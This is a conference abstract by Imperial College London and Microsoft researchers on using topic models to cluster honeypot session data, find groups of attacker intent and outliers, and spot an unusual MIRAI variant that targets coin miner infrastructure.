A0365
Title: Unsupervised attack pattern detection in cyber-security using topic modelling
Authors: Anastasia Mantziou - Imperial College London (United Kingdom) [presenting]
Francesco Sanna Passino - Imperial College London (United Kingdom)
Nick Heard - Imperial College London (United Kingdom)
Philip Thiede - Imperial College London (United Kingdom)
Ross Bevington - Microsoft (United Kingdom)
Abstract: Cyber systems are constantly under threat of intrusion attempts. Attacks are usually carried out with one underlying specific intent, or from groups of actors with similar objectives. Therefore, discovering such patterns is extremely valuable to threat experts. From a statistical point of view, this objective translates into a clustering task. The aim is to explore topic models for clustering session data collected on honeypots, particular hosts designed to entice malicious intruders. The main practical implications of clustering the sessions are two-fold: finding similar groups and identifying outliers. An array of methodologies is considered, suitably adapted to the challenges encountered with computer network data. In particular, the concepts of primary topics, session-level and command-level topics are introduced, along with a secondary topic for instruction representing common high-frequency commands. Furthermore, the proposed method is extended to allow for an unbounded number of latent intents. The methodologies are used to discover an unusual MIRAI variant which attempts to take over existing coin miner infrastructure.
